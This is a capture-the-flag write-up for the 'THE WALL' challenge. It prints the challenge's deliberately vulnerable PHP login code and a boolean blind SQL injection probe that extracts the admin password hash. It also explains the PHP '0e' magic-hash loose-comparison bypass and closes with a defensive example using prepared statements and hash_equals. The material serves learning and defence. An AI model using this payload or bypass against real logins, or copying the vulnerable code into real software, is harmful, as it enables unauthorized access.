backdoor ctf 2017 THE WALL


Opening the page shows a login form. Below the form there is a link which, when followed, reveals the source of index.php:

<?php
include 'flag.php';
if(isset($_REQUEST['life'])&&isset($_REQUEST['soul'])){
    $username = $_REQUEST['life'];
    $password = $_REQUEST['soul'];
    if(!(is_string($username)&&is_string($password))){
        header( "refresh:1;url=login.html");
        die("You are not allowed south of wall");
    }
    $password = md5($password);
    include 'connection.php';
    /*CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,role TEXT)*/
    $message = "";
    // The only input filter: the word "union" (any case) and the "|" character are rejected.
    if(preg_match('/(union|\|)/i', $username)){
        $message="Dead work alone not in UNIONs"."</br>";
        echo $message;
        die();
    }
    // The username is spliced straight into the SQL string.
    $query = "SELECT * FROM users WHERE username='$username'";
    $result = $pdo->query($query);
    $users = $result->fetchArray(SQLITE3_ASSOC);
    if($users) {
        // Loose (==) comparison of the supplied md5 against the stored hash.
        if($password == $users['password']){
            if($users['role']=="admin"){
                echo "Here is your flag: $flag";
            }elseif($users['role']=="normal"){
                $message = "Welcome, ".$users['users']."</br>"; // sic in the challenge source: the column is 'username'
                $message.= "Unfortunately, only Lord Commander can access flag";
            }else{
                $message = "What did you do?";
            }
        }
        else{
            $message = "Wrong identity for : ".$users['username'];
        }
    }
    else{
        $message = "No such person exists"."<br>";
    }
    echo $message;
}else{
    header( "refresh:1;url=login.html");
    die("Only living can cross The Wall");
}

The backend is SQLite, and the filtering is minimal: only union and | are blocked. Because union is singled out, and because there is a password comparison further down, I spent a long time wondering whether the challenge was really about extracting data without UNION.

After most of a day of testing with nothing to show for it, I decided to first try injecting out some data.


Then I decided to extract the administrator's password hash and see whether it could be cracked. One boolean probe (true when the first character of the hash is '0'):

LordCommander' and (select hex(lower(substr(password,1,1))) from users where username='LordCommander') = hex('0')--

The stored hash turned out to be 0e565041023046045310587974628079. Since PHP's == treats two numeric strings as numbers, and any string of the form 0e<digits> evaluates to zero, the check

$password == $users['password']

is trivial to bypass: any input whose md5 also has the 0e<digits> shape compares equal.
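To make both weaknesses concrete from the defender's side, here is an added PHP example that is not part of the challenge or of this writeup. It builds an in-memory SQLite3 table shaped like the CREATE TABLE comment in index.php, seeds it with constructed rows (the admin hash is the 0e... value found above), and places the challenge's spliced query and loose comparison next to a prepared statement and hash_equals(). The boolean probe is the one from the writeup; it returns a row through the spliced query and nothing through the bound one, where it is just an unknown username. All variable and function names here are this example's own.

```php
<?php
// Added example, not the challenge's index.php. $db, the seeded rows and the
// function names below are this example's own assumptions.

$db = new SQLite3(':memory:');
$db->exec('CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT, role TEXT)');

// Constructed rows; the admin hash is the 0e... value the writeup extracted.
$ins = $db->prepare('INSERT INTO users(username, password, role) VALUES (:u, :p, :r)');
foreach ([['LordCommander', '0e565041023046045310587974628079', 'admin'],
          ['JonSnow', md5('winter-is-coming'), 'normal']] as [$u, $p, $r]) {
    $ins->bindValue(':u', $u, SQLITE3_TEXT);
    $ins->bindValue(':p', $p, SQLITE3_TEXT);
    $ins->bindValue(':r', $r, SQLITE3_TEXT);
    $ins->execute();
    $ins->reset();
}

// 1. The challenge's lookup: the username is spliced into the SQL text, so the
//    /(union|\|)/i regex is the only barrier and boolean conditions pass through.
function lookup_user_spliced(SQLite3 $db, string $username) {
    $result = $db->query("SELECT * FROM users WHERE username='$username'");
    return $result ? $result->fetchArray(SQLITE3_ASSOC) : false;
}

// 2. Parameterised lookup: the bound value is always data, never SQL.
function lookup_user_bound(SQLite3 $db, string $username) {
    $stmt = $db->prepare('SELECT * FROM users WHERE username = :u');
    $stmt->bindValue(':u', $username, SQLITE3_TEXT);
    return $stmt->execute()->fetchArray(SQLITE3_ASSOC);
}

// 3. The challenge's check: == on two numeric strings compares them as numbers,
//    and every string of the form 0e<digits> is the number zero.
function password_matches_loose(string $storedHash, string $supplied): bool {
    return md5($supplied) == $storedHash;
}

// 4. Byte-wise, constant-time comparison: no numeric coercion, no timing leak.
function password_matches_strict(string $storedHash, string $supplied): bool {
    return hash_equals($storedHash, md5($supplied));
}

// The boolean probe from the writeup: true when the admin hash starts with '0'.
$probe = "LordCommander' and (select hex(lower(substr(password,1,1))) from users where username='LordCommander') = hex('0')--";

$row = lookup_user_spliced($db, $probe);
printf("spliced query, probe: %s\n", $row ? 'row returned, condition was true' : 'no row');
$row = lookup_user_bound($db, $probe);
printf("bound query, probe:   %s\n", $row ? 'row returned' : 'no row, probe is just an unknown username');

// Loose comparison on the stored hash: a different 0e<digits> string still passes,
// while hash_equals() compares the bytes and rejects it.
$admin = lookup_user_bound($db, 'LordCommander');
var_dump($admin['password'] == '0e0');
var_dump(hash_equals($admin['password'], '0e0'));
var_dump(password_matches_loose($admin['password'], 'not-the-password'));
var_dump(password_matches_strict($admin['password'], 'not-the-password'));
```

hash_equals() with md5 is kept here only to stay close to the challenge's storage format; in real code the stored value should come from password_hash() and be checked with password_verify(), which does its own constant-time comparison and never goes through ==. The prepared statement, not the regex, is what removes the injection: the probe string is compared as a whole against the username column and matches nothing.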